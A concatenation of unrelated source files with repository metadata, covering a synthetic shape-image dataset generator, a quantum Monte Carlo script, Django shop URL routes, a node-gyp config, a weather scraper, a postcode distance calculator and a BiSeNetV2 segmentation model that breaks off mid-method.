starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
ends = starts + np.stack([widths, heights], axis=1)
starts = starts.astype(np.uint32)
ends = ends.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.rectangle([tuple(starts[i]), tuple(ends[i])], fill=255)
def circleold(images, min_size=32, max_size=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
diameters = np.random.uniform(min_size, max_size, n_images)
x_lows = np.clip(-diameters+1, 1, image_width-1)
x_highs = np.clip(image_width-diameters-1, 1, image_width-1)
y_lows = np.clip(-diameters+1, 1, image_height-1)
y_highs = np.clip(image_height-diameters-1, 1, image_height-1)
starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
ends = starts + np.stack([diameters, diameters], axis=1)
starts = starts.astype(np.uint32)
ends = ends.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.ellipse([tuple(starts[i]), tuple(ends[i])], fill=0, outline=255, width=6)
def triangle(images, min_size=48, max_size=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
# two triangle sides
lengths = np.random.uniform(min_size, max_size, [n_images, 2])
# orientation
directions = np.random.uniform(-np.pi, np.pi, n_images)
# inner angle, narrow to equilateral
inner_angles = np.random.uniform(2*np.pi* 1/6, 2*np.pi * 1/6, n_images)
line1x = lengths[:, 0] * np.cos(directions)
line1y = lengths[:, 0] * np.sin(directions)
line2x = lengths[:, 1] * np.cos(directions + inner_angles)
line2y = lengths[:, 1] * np.sin(directions + inner_angles)
# bounding box relative to start point
width_low = np.minimum(0, np.minimum(line1x, line2x))
width_high = np.maximum(0, np.maximum(line1x, line2x))
height_low = np.minimum(0, np.minimum(line1y, line2y))
height_high = np.maximum(0, np.maximum(line1y, line2y))
x_lows = np.clip(-width_low+1, 1, image_width-1)
x_highs = np.clip(image_width-width_high-1, 1, image_width-1)
y_lows = np.clip(-height_low+1, 1, image_height-1)
y_highs = np.clip(image_height-height_high-1, 1, image_height-1)
starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
point1 = starts + np.stack([line1x, line1y], axis=1)
point2 = starts + np.stack([line2x, line2y], axis=1)
starts = starts.astype(np.uint32)
point1 = point1.astype(np.uint32)
point2 = point2.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.line([tuple(starts[i]), tuple(point1[i])], fill=255, width=6)
d.line([tuple(point1[i]), tuple(point2[i])], fill=255, width=6)
d.line([tuple(starts[i]), tuple(point2[i])], fill=255, width=6)
# make a convenient structure for our data
def create_dataset_obj(x_all, y_all, z_all, n_classes):
x_all = tf.convert_to_tensor(x_all)
y_all = tf.convert_to_tensor(y_all)
z_all = tf.convert_to_tensor(z_all)
inds = np.random.permutation(len(x_all))
n_all = len(x_all)
n_test = len(x_all) // 10
n_val = len(x_all) // 10
n_train = n_all - n_test - n_val
# 80% train : 10% val : 10% test split
train_indices = inds[:n_train]
val_indices = inds[n_train:n_train+n_val]
test_indices = inds[n_train+n_val:n_train+n_val+n_test]
return {
"image_size": x_all.shape[1],
"n_classes": n_classes,
"n_all": len(x_all),
"x_all": x_all,
"y_all": y_all,
"n_z": len(z_all),
"z_all": z_all,
"n_train": len(train_indices),
"x_train": tf.gather(x_all, train_indices),
"y_train": tf.gather(y_all, train_indices),
"n_val": len(val_indices),
"x_val": tf.gather(x_all, val_indices),
"y_val": tf.gather(y_all, val_indices),
"n_test": len(test_indices),
"x_test": tf.gather(x_all, test_indices),
"y_test": tf.gather(y_all, test_indices),
}
def make_image_dataset(n_x_data, n_z_data=2000, image_size=24, latent_dims=6, pixel_dtype=np.uint8):
n_classes = len(list(all_classes()))
n_per_class = n_x_data // n_classes
params = [par for par in all_classes()] * n_per_class
class_labels = np.identity(n_classes)
classes = [class_labels[i] for i, par in enumerate(all_classes())] * n_per_class
# class1_labels = np.identity(len(shape_types))
# class2_labels = np.identity(len(line_types))
# class3_labels = np.identity(len(colors))
# tclasses = [
# (class1_labels[shape_types.index(shape_type)], class2_labels[line_types.index(line_type)], class3_labels[colors.index(color)]) for shape_type, line_type, color in all_classes()
# ] * n_per_class
draw_size = 200
resize_to = image_size
line_width = draw_size / 25
min_radius = line_width * 6
max_radius = min_radius * 1.5
images = shapes(params, draw_size, resize_to, min_radius=min_radius, max_radius=max_radius, line_width=line_width)
gaussian_z = tf.random.normal([n_z_data, latent_dims])
return create_dataset_obj(images, classes, gaussian_z, n_classes)
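# Illustrative usage (a sketch; the argument values below are assumptions, not taken
# from the original project):
#   dataset = make_image_dataset(n_x_data=600, n_z_data=200, image_size=24, latent_dims=6)
#   print(dataset["n_train"], dataset["n_val"], dataset["n_test"], dataset["x_train"].shape)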
|
[
"maxeonyx@gmail.com"
] |
maxeonyx@gmail.com
|
abdd045c9ecaae3f016d3bcef6a016289fa19727
|
d32d094e50f7173d73c01599687287b864e96fb1
|
/wk6/assignment/b2.py
|
915f9718238977b34070b470b7967ea5732f709f
|
[] |
no_license
|
grasingerm/statsmek
|
7eae64267640a09ac4cc16c565e99d248e65585e
|
9f9cb39417d4cf0e6ce87f64ee92b36a077c319d
|
refs/heads/master
| 2020-04-05T23:29:00.805244
| 2017-12-18T21:31:11
| 2017-12-18T21:31:11
| 60,022,949
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,546
|
py
|
import math, random, pylab
def rho_free(x, y, beta):
return math.exp(-(x - y)**2 / (2.0 * beta))
def levy_harmonic_path(xstart, xend, dtau, N):
x = [xstart]
for k in range(1, N):
dtau_prime = (N - k) * dtau
Ups1 = 1.0 / math.tanh(dtau) + 1.0 / math.tanh(dtau_prime)
Ups2 = x[k-1] / math.sinh(dtau) + xend / math.sinh(dtau_prime)
x.append(random.gauss(Ups2 / Ups1, 1.0 / math.sqrt(Ups1)))
return x
beta = 20.0
N = 2
Ncut = N / 2
dtau = beta / N
delta = 1.0
n_steps = 1000000
x = [5.0] * N
data = []
for step in range(n_steps):
x = levy_harmonic_path(x[0], x[0], dtau, N)
x = x[Ncut:] + x[:Ncut]
if step % N == 0:
k = random.randint(0, N-1)
data.append(x[k])
if step % 100000 == 0:
print 'step ', step
final_path = x[:]
pylab.hist(data, normed=True, bins=100, label='QMC')
list_x = [0.1 * a for a in range(-30, 31)]
list_y = [math.sqrt(math.tanh(beta / 2.0)) / math.sqrt(math.pi) * \
math.exp(-x ** 2 * math.tanh(beta / 2.0)) for x in list_x]
pylab.plot(list_x, list_y, label='analytic')
pylab.legend()
pylab.xlabel('$x$')
pylab.ylabel('$\\pi(x)$ (normalized)')
pylab.title('levy_harmonic_path ($\\beta=%s, N=%i$)' % (beta, N))
pylab.xlim(-2, 2)
pylab.savefig('plot_B2_beta%s.png' % beta)
pylab.show()
pylab.clf()
pylab.plot(final_path, [dtau * n for n in range(N)])
pylab.xlabel('$x$')
pylab.ylabel('$\\tau$')
pylab.title('levy_harmonic_path ($\\beta=%s, N=%i$)' % (beta, N))
pylab.savefig('plot_B2_beta%s_final-path.png' % beta)
pylab.show()
|
[
"grasingerm@gmail.com"
] |
grasingerm@gmail.com
|
b2c92dde453dc89b535d08529a505c032ea3554c
|
a0e9dbb155d5b7f82bb3dea38ce63e37f8a916d7
|
/LaLune/urls.py
|
ca677ae63f06e5a146f9ad1cf0e2b37b04916c33
|
[] |
no_license
|
eminam98/lalune
|
792ac9a66c5b1e9fd6086706a31f44bb4f943a6b
|
9fc10ec3342e3f16b76b85bddf82b9163a97c121
|
refs/heads/master
| 2022-12-26T22:56:21.098397
| 2020-10-11T20:01:30
| 2020-10-11T20:01:30
| 302,958,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,771
|
py
|
from django.urls import path
from .import views
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.auth import views as auth_views
urlpatterns = [
path('', views.home, name='home'),
path('about/', views.about, name='about'),
path('faq/', views.faq, name='faq'),
path('politika/', views.politika, name='politika'),
path('naruciti/', views.naruciti, name='naruciti'),
path('register/', views.UserFormView.as_view(), name='register'),
path('login/', auth_views.LoginView.as_view(template_name='LaLune/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='LaLune/logout.html'), name='logout'),
path('profile/', views.profile, name='profil'),
path('contact/', views.contact, name='kontakt'),
path('galerija/', views.galerija, name='galerija'),
path('proizvodi/', views.store, name="proizvodi"),
path('oci/', views.oci, name="oci"),
path('lice/', views.lice, name="lice"),
path('usne/', views.usne, name="usne"),
path('korpa/', views.cart, name="korpa"),
path('checkout/', views.checkout, name="checkout"),
path('proizvodi/update_item/', views.updateItem, name="update_item"),
path('korpa/update_item/', views.updateItem, name="update_item"),
path('oci/update_item/', views.updateItem, name="update_item"),
path('usne/update_item/', views.updateItem, name="update_item"),
path('lice/update_item/', views.updateItem, name="update_item"),
path('checkout/process_order/', views.processOrder, name="process_order"),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"ryuzakiemy@gmail.com"
] |
ryuzakiemy@gmail.com
|
6307442c7594a2db8145b1a4f113bc74e4b77908
|
efd5481d02f77de1b7b9630c2a2781f03f8b9edc
|
/node_modules/mongojs/node_modules/mongodb/node_modules/kerberos/build/config.gypi
|
3bcdbb1c39ae78842ab15e4ef1681a008aba1a48
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
prashant-git/rss-reader
|
7b007ce6645726b53f7ad675e13cf24fa1e58f69
|
43bb9cea44555f76aa63594ccd06f0984c11926a
|
refs/heads/master
| 2020-05-20T09:32:03.865246
| 2014-02-07T10:40:49
| 2014-02-07T10:40:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 48,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/home/samphal/.node-gyp/0.10.24",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"sign_git_tag": "",
"always_auth": "",
"user_agent": "node/v0.10.24 linux x64",
"bin_links": "true",
"key": "",
"description": "true",
"fetch_retries": "2",
"heading": "npm",
"user": "",
"force": "",
"cache_min": "10",
"init_license": "ISC",
"editor": "vi",
"rollback": "true",
"cache_max": "null",
"userconfig": "/home/samphal/.npmrc",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/home/samphal/tmp",
"depth": "null",
"save_dev": "",
"usage": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr/local",
"registry": "https://registry.npmjs.org/",
"browser": "",
"cache_lock_wait": "10000",
"save_optional": "",
"searchopts": "",
"versions": "",
"cache": "/home/samphal/.npm",
"ignore_scripts": "",
"searchsort": "name",
"version": "",
"local_address": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"cert": "",
"global": "",
"link": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "true",
"node_version": "v0.10.24",
"tag": "latest",
"git_tag_version": "true",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"strict_ssl": "true",
"username": "",
"dev": "",
"globalconfig": "/usr/local/etc/npmrc",
"init_module": "/home/samphal/.npm-init.js",
"parseable": "",
"globalignorefile": "/usr/local/etc/npmignore",
"cache_lock_retries": "10",
"group": "1000",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"email": "",
"json": ""
}
}
|
[
"prashantjadhav7771@gmail.com"
] |
prashantjadhav7771@gmail.com
|
db9bdb4488364e2c1c8697da29971ab8f544268a
|
e21fa75b83dd068b55dde463c468cfe25d80d66b
|
/crawl_temperature.py
|
fe5bdd0a19d98079807c466f925ec396809cacb1
|
[] |
no_license
|
BarclayII/big-data-project
|
84e69a2c3a960db6facfa876aa8802b8b45947fc
|
5f9ed774b6948c9b507b3b1206a1ab8935ed676c
|
refs/heads/master
| 2021-01-23T03:43:06.999203
| 2017-09-08T15:43:58
| 2017-09-08T15:43:58
| 86,112,814
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,914
|
py
|
import lxml.etree as ETREE
import urllib2
import datetime
import time
def find_temperature(string):
tree = ETREE.fromstring(string, parser=ETREE.HTMLParser())
body = tree.find('body')
div = [d for d in body.findall('div') if d.attrib.get('id', None) == 'content-wrap'][0]
div = [d for d in div.findall('div') if d.attrib.get('id', None) == 'inner-wrap'][0]
section = [s for s in div.findall('section')
if s.attrib.get('id', None) == 'inner-content' and s.attrib['role'] == 'main'][0]
div = [d for d in section.findall('div') if d.attrib.get('class', None) == 'mainWrapper'][0]
div = [d for d in div.findall('div') if d.attrib.get('class', None) == 'row collapse'][1]
div = [d for d in div.findall('div') if d.attrib.get('class', None) == 'column large-8 right-spacing'][0]
table = [t for t in div.findall('table') if t.attrib.get('id', None) == 'historyTable'][0]
tbody = table.find('tbody')
tr = [r for r in tbody.findall('tr')][1]
td = [d for d in tr.findall('td')][1]
span = [s for s in td.findall('span') if s.attrib.get('class', None) == 'wx-data'][0]
span = [s for s in span.findall('span') if s.attrib.get('class', None) == 'wx-value'][0]
return span.text.strip()
template = 'https://www.wunderground.com/history/airport/KNYC/%y/%m/%d/DailyHistory.html?req_city=New+York&req_state=NY&req_statename=New+York&reqdb.zip=10001&reqdb.magic=8&reqdb.wmo=99999&MR=1'
current_date = datetime.datetime(2011, 1, 1)
end_date = datetime.datetime(2015, 12, 31)
while current_date <= end_date:
url = (
template
.replace('%y', str(current_date.year))
.replace('%m', str(current_date.month))
.replace('%d', str(current_date.day))
)
print '%s\t%s' % (str(current_date), find_temperature(urllib2.urlopen(url).read()))
current_date += datetime.timedelta(1)
time.sleep(1)
|
[
"coin2028@hotmail.com"
] |
coin2028@hotmail.com
|
67d8eef410ae22998121012c67b00809a61b9b31
|
c6adb271681e4101f09581692e70af0b18468f16
|
/INDIA/main.py
|
2679ea26f870d9a30323763630790610a5bdf2c0
|
[] |
no_license
|
madhuv-sharma/nearest-postcodes-calculator
|
b1111b2a9d22f021d9d35e2b92885e3506277ee7
|
afb122fed4dba93803b02d47644a3419f169c540
|
refs/heads/master
| 2023-06-20T17:54:56.303121
| 2021-07-31T01:12:34
| 2021-07-31T01:12:34
| 376,571,219
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,536
|
py
|
# import numpy as np # Can be used instead of 'math' module for faster calculations in 'dist' function
from math import *
import csv
import sys
'''
Based on the Haversine formula, the distance between two points with geocoordinates (Lat1,Lon1) and (Lat2,Lon2) is
2r*arcsin(sqrt(sin^2((Lat2-Lat1)/2) + cos(Lat1)*cos(Lat2)*sin^2((Lon2-Lon1)/2)))
'''
def dist(lat1, lon1, lat2, lon2):
lat1, lon1, lat2, lon2 = map(radians, [lat1, lon1, lat2, lon2])
c = 2 * asin(sqrt(sin((lat2-lat1)/2)**2 + cos(lat1) * cos(lat2) * sin((lon2-lon1)/2)**2))
r = 6371.137 # Earth radius in kilometers (approximately the mean radius)
return c * r
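# Quick sanity check (illustrative only): one degree of longitude along the equator is
# about r * pi / 180 ≈ 111.2 km, so the call below should print roughly 111.2.
# print(dist(0.0, 0.0, 0.0, 1.0))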
#Finding 10 Closest Pin Codes from the Given Pin Code
def closestLocations(lat1, lon1, in_file_loc):
data=[]
with open(in_file_loc, "r") as csv_file:
csv_reader=csv.reader(csv_file, delimiter=',')
for row in csv_reader:
try:
row[5]=dist(lat1, lon1, float(row[3]), float(row[4]))
except ValueError: # For entries having no geocoordinates
continue
data.append(row)
data=sorted(data, key=lambda abc:abc[5]) # Sorting the data in ascending order of distance
print("Do you want to save the output data in a file? (Enter y/n)\n")
ch=input()
if ch=='y' :
print("Output Database Location :\n")
out_file_loc=input()
try:
with open(out_file_loc, "w", newline='') as f:
csv_writer=csv.writer(f)
lc=0
for row in data:
if lc<=10:
if lc==0:
row[1]=row[1].upper()
row[2]=row[2].upper()
csv_writer.writerow(row)
lc+=1
except FileNotFoundError :
print("File not Found")
sys.exit(1)
elif ch!='n' :
print("Taking it as a no")
lc=0
for row in data:
if lc<=10:
if lc==0:
row[1]=row[1].upper()
row[2]=row[2].upper()
print(row)
lc+=1
#Inputting File Location and Pin Code, checking whether they are valid, and calling the closestLocations function
def main():
print("Input Database Location :\n")
in_file_loc=input()
try:
with open(in_file_loc, "r") as csv_file:
csv_reader=csv.reader(csv_file, delimiter=',')
print("Enter Pin Code to find nearest locations - ")
pincode=int(input())
f=0
next(csv_reader, None)
for row in csv_reader:
if int(row[0]) == pincode :
lat1=float(row[3])
lon1=float(row[4])
f=1
break
if f==1 :
closestLocations(lat1, lon1, in_file_loc)
else:
print("Sorry, Pin Code is Not in the Database!")
except ValueError:
print("Wrong Input")
except FileNotFoundError :
print("File not Found")
if __name__=='__main__':
main()
|
[
"madhuvsharma1234@gmail.com"
] |
madhuvsharma1234@gmail.com
|
118f481de0590924d73beab2e7c968938599237f
|
62f3f4f5b9d1f75f96760b07ce0af1bce574a876
|
/model/bisenetv2.py
|
90ccedc6454f7f7e92fb364d3411b2b702de3be7
|
[] |
no_license
|
XinZhaoFu/lajidaima
|
bc40f1f31cd1131e9054db7c6561d40e1656a7db
|
d346ee2a2004fe19cc1b1e97d0c0d98ed9415528
|
refs/heads/main
| 2023-07-10T08:13:12.053751
| 2021-08-17T02:31:17
| 2021-08-17T02:31:17
| 365,449,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,716
|
py
|
from tensorflow.keras import Model
from model.utils import Con_Bn_Act, DW_Con_Bn_Act, Sep_Con_Bn_Act
from tensorflow.keras.layers import MaxPooling2D, concatenate, AveragePooling2D, Activation, \
AveragePooling2D, UpSampling2D, add, multiply
class BisenetV2(Model):
def __init__(self, detail_filters=64,
semantic_filters=None,
aggregation_filters=128,
num_class=2,
final_act='softmax'):
super(BisenetV2, self).__init__()
self.final_act = final_act
self.num_class = num_class
if semantic_filters is None:
self.semantic_filters = [16, 32, 64, 128]
else:
self.semantic_filters = semantic_filters
self.aggregation_filters = aggregation_filters
self.detail_filters = detail_filters
self.detail_branch = Detail_Branch(filters=self.detail_filters)
self.semantic_branch = Semantic_Branch(filters=16)
self.aggregation = Bilateral_Guided_Aggregation_Block(filters=self.aggregation_filters,
num_class=self.num_class,
final_act=self.final_act)
def call(self, inputs, training=None, mask=None):
detail_branch = self.detail_branch(inputs)
semantic_branch = self.semantic_branch(inputs)
out = self.aggregation([detail_branch, semantic_branch])
return out
class Detail_Branch(Model):
def __init__(self, filters=64):
super(Detail_Branch, self).__init__()
self.filters = filters
self.s1_con_1 = Con_Bn_Act(filters=self.filters,
strides=1,
name='detail_branch_s1_con_1')
self.s1_con_2 = Con_Bn_Act(filters=self.filters,
name='detail_branch_s1_con_2')
self.s2_con_1 = Con_Bn_Act(filters=self.filters,
strides=1,
name='detail_branch_s2_con_1')
self.s2_con_x2 = Con_Bn_Act(filters=self.filters,
name='detail_branch_s2_con_x2')
self.s3_con_1 = Con_Bn_Act(filters=self.filters * 2,
strides=1,
name='detail_branch_s3_con_1')
self.s3_con_x2 = Con_Bn_Act(filters=self.filters * 2,
name='detail_branch_s3_con_x2')
def call(self, inputs, training=None, mask=None):
s1_con_1 = self.s1_con_1(inputs)
s1_con_2 = self.s1_con_2(s1_con_1)
s2_con_1 = self.s2_con_1(s1_con_2)
s2_con_2 = self.s2_con_x2(s2_con_1)
s2_con_3 = self.s2_con_x2(s2_con_2)
s3_con_1 = self.s3_con_1(s2_con_3)
s3_con_2 = self.s3_con_x2(s3_con_1)
out = self.s3_con_x2(s3_con_2)
return out
class Semantic_Branch(Model):
def __init__(self, filters=16):
super(Semantic_Branch, self).__init__()
self.filters = filters
self.stem = Stem_Block(filters=self.filters)
self.s3_GE_down_1 = Gather_Expansion_Down_Block(filters=self.filters*2)
self.s3_GE_2 = Gather_Expansion_Block(filters=self.filters*2)
self.s4_GE_down_1 = Gather_Expansion_Down_Block(filters=self.filters*4)
self.s4_GE_2 = Gather_Expansion_Block(filters=self.filters*4)
self.s5_GE_down_1 = Gather_Expansion_Down_Block(filters=self.filters*8)
self.s5_GE_x3 = Gather_Expansion_Block(filters=self.filters*8)
self.s5_CE = Context_Embedding_Block(filters=self.filters*8)
def call(self, inputs, training=None, mask=None):
stem = self.stem(inputs)
s3_GE_down_1 = self.s3_GE_down_1(stem)
s3_GE_2 = self.s3_GE_2(s3_GE_down_1)
s4_GE_down_1 = self.s4_GE_down_1(s3_GE_2)
s4_GE_2 = self.s4_GE_2(s4_GE_down_1)
s5_GE_down_1 = self.s5_GE_down_1(s4_GE_2)
s5_GE_2 = self.s5_GE_x3(s5_GE_down_1)
s5_GE_3 = self.s5_GE_x3(s5_GE_2)
s5_GE_4 = self.s5_GE_x3(s5_GE_3)
out = self.s5_CE(s5_GE_4)
return out
class Stem_Block(Model):
def __init__(self, filters=16):
super(Stem_Block, self).__init__()
self.filters = filters
self.con_1 = Con_Bn_Act(filters=self.filters,
strides=2,
name='stem_block_con_1')
self.branch1_con_1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='stem_block_branch1_con_1')
self.branch1_con_2 = Con_Bn_Act(filters=self.filters,
strides=2,
name='stem_block_branch1_con_2')
self.branch2_maxpooling = MaxPooling2D(strides=2,
name='stem_block_branch2_maxpooling')
self.concat_con = Con_Bn_Act(filters=self.filters,
name='stem_block_concat_con')
def call(self, inputs, training=None, mask=None):
con_1 = self.con_1(inputs)
branch_1_con_1 = self.branch1_con_1(con_1)
branch_1_con_2 = self.branch1_con_2(branch_1_con_1)
branch_2_maxpooling = self.branch2_maxpooling(con_1)
concat = concatenate([branch_1_con_2, branch_2_maxpooling], axis=3)
out = self.concat_con(concat)
return out
class Context_Embedding_Block(Model):
def __init__(self, filters=128):
super(Context_Embedding_Block, self).__init__()
self.filters = filters
self.gapooling = AveragePooling2D(name='context_embedding_block_gapooling', padding='same')
self.con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='context_embedding_block_con_1x1')
self.up = UpSampling2D(name='context_embedding_block_up')
self.add_con_2 = Con_Bn_Act(filters=self.filters,
name='context_embedding_block_concat_con')
self.x8_up1 = UpSampling2D(size=(2, 2), name='context_embedding_block_x8_up1')
self.x8_scbr1 = Sep_Con_Bn_Act(filters=self.filters, name='context_embedding_block_x8_scbr1')
self.x8_up2 = UpSampling2D(size=(2, 2), name='context_embedding_block_x8_up2')
self.x8_scbr2 = Sep_Con_Bn_Act(filters=self.filters, name='context_embedding_block_x8_scbr2')
self.x8_up3 = UpSampling2D(size=(2, 2), name='context_embedding_block_x8_up3')
self.x8_scbr3 = Sep_Con_Bn_Act(filters=self.filters, name='context_embedding_block_x8_scbr3')
def call(self, inputs, training=None, mask=None):
gapooling = self.gapooling(inputs)
con_1x1 = self.con_1x1(gapooling)
up = self.up(con_1x1)
add_1 = add([inputs, up])
add2 = self.add_con_2(add_1)
x8_up1 = self.x8_up1(add2)
x8_scbr1 = self.x8_scbr1(x8_up1)
x8_up2 = self.x8_up2(x8_scbr1)
x8_scbr2 = self.x8_scbr2(x8_up2)
x8_up3 = self.x8_up3(x8_scbr2)
out = self.x8_scbr3(x8_up3)
return out
class Gather_Expansion_Down_Block(Model):
def __init__(self, filters, is_down1=True, is_down2=True):
super(Gather_Expansion_Down_Block, self).__init__()
self.filters = filters
self.con_3x3 = Con_Bn_Act(filters=self.filters,
name='gather_expansion_down_con_3x3')
if is_down1:
self.dw_con_3x3_1 = DW_Con_Bn_Act(filters=self.filters*6,
strides=2,
activation=None,
name='gather_expansion_down_dw_con_3x3_1')
else:
self.dw_con_3x3_1 = DW_Con_Bn_Act(filters=self.filters * 6,
activation=None,
name='gather_expansion_down_dw_con_3x3_1')
self.dw_con_3x3_2 = DW_Con_Bn_Act(filters=self.filters*6,
activation=None,
name='gather_expansion_down_dw_con_3x3_2')
self.con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='gather_expansion_down_con_1x1')
if is_down2:
self.res_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
strides=2,
activation=None,
name='gather_expansion_down_res_dw_con_3x3')
else:
self.res_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
activation=None,
name='gather_expansion_down_res_dw_con_3x3')
self.res_con_1x1 = Con_Bn_Act(filters=self.filters,
kernel_size=(1, 1),
name='gather_expansion_down_res_con_1x1')
self.relu = Activation('relu')
def call(self, inputs, training=None, mask=None):
con_3x3 = self.con_3x3(inputs)
dw_con_3x3_1 = self.dw_con_3x3_1(con_3x3)
dw_con_3x3_2 = self.dw_con_3x3_2(dw_con_3x3_1)
con_1x1 = self.con_1x1(dw_con_3x3_2)
res_sw_con_3x3 = self.res_dw_con_3x3(inputs)
res_con_1x1 = self.res_con_1x1(res_sw_con_3x3)
add_res = add([con_1x1, res_con_1x1])
out = self.relu(add_res)
return out
class Gather_Expansion_Block(Model):
def __init__(self, filters):
super(Gather_Expansion_Block, self).__init__()
self.filters = filters
self.con_3x3 = Con_Bn_Act(filters=self.filters,
name='gather_expansion_con_3x3')
self.dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters*6,
activation=None,
name='gather_expansion_dw_con_3x3')
self.con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='gather_expansion_con_1x1')
self.relu = Activation('relu')
def call(self, inputs, training=None, mask=None):
con_3x3 = self.con_3x3(inputs)
dw_con_3x3 = self.dw_con_3x3(con_3x3)
con_1x1 = self.con_1x1(dw_con_3x3)
add_res = add([con_1x1, inputs])
out = self.relu(add_res)
return out
class Bilateral_Guided_Aggregation_Block(Model):
def __init__(self, filters=128, num_class=151, final_act='softmax'):
super(Bilateral_Guided_Aggregation_Block, self).__init__()
self.final_act = final_act
self.num_class = num_class
self.filters = filters
self.detail_remain_1_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
activation=None,
name='aggregation_detail_remain_1_dw_con_3x3')
self.detail_remain_2_con_1x1 = Con_Bn_Act(filters=self.filters,
kernel_size=(1, 1),
name='aggregation_detail_remain_2_con_1x1')
self.detail_down_1_con_3x3 = Con_Bn_Act(filters=self.filters,
strides=2,
activation=None,
name='aggregation_detail_down_1_con3x3')
self.detail_down_2_apooling = AveragePooling2D(pool_size=(3, 3),
strides=2,
padding='same',
name='aggregation_detail_down_2_apooling')
self.semantic_up_1_con_3x3 = Con_Bn_Act(filters=self.filters,
activation=None,
name='aggregation_semantic_up_1_con_3x3')
self.semantic_up_2_up_4x4 = UpSampling2D(size=(4, 4))
self.semantic_up_3_sigmoid = Activation('sigmoid')
self.semantic_remain_1_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
activation=None,
name='aggregation_semantic_remain_1_dw_con_3x3')
self.semantic_remain_2_con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='aggregation_semantic_remain_2_con_1x1')
self.semantic_remain_3_sigmoid = Activation('sigmoid')
self.semantic_up = UpSampling2D(size=(4, 4))
self.sum_con_3x3 = Con_Bn_Act(filters=self.num_class,
activation=self.final_act,
name='aggregation_sum_con_3x3')
def call(self, inputs, training=None, mask=None):
detail_branch_remain_1_dw_con_3x3 = self.detail_remain_1_dw_con_3x3(inputs[0])
detail_branch_remain_2_con_1x1 = self.detail_remain_2_con_1x1(detail_branch_remain_1_dw_con_3x3)
detail_branch_down_1_con3x3 = self.detail_down_1_con_3x3(inputs[0])
detail_branch_down_2_apooling = self.detail_down_2_apooling(detail_branch_down_1_con3x3)
semantic_branch_up_1_con_3x3 = self.semantic_up_1_con_3x3(inputs[1])
semantic_branch_up_2_up_4x4 = self.semantic_up_2_up_4x4(semantic_branch_up_1_con_3x3)
semantic_branch_up_3_sigmoid = self.semantic_up_3_sigmoid(semantic_branch_up_2_up_4x4)
semantic_branch_remain_1_dw_con_3x3 = self.semantic_remain_1_dw_con_3x3(inputs[1])
semantic_branch_remain_2_con_1x1 = self.semantic_remain_2_con_1x1(
semantic_branch_remain_1_dw_con_3x3)
semantic_branch_remain_3_sigmoid = self.semantic_remain_3_sigmoid(semantic_branch_remain_2_con_1x1)
detail_multiply = multiply([detail_branch_remain_2_con_1x1, semantic_branch_up_3_sigmoid])
semantic_multiply = multiply([semantic_branch_remain_3_sigmoid, detail_branch_down_2_apooling])
semantic_up = self.semantic_up(semantic_multiply)
detail_semantic_sum = add([detail_multiply, semantic_up])
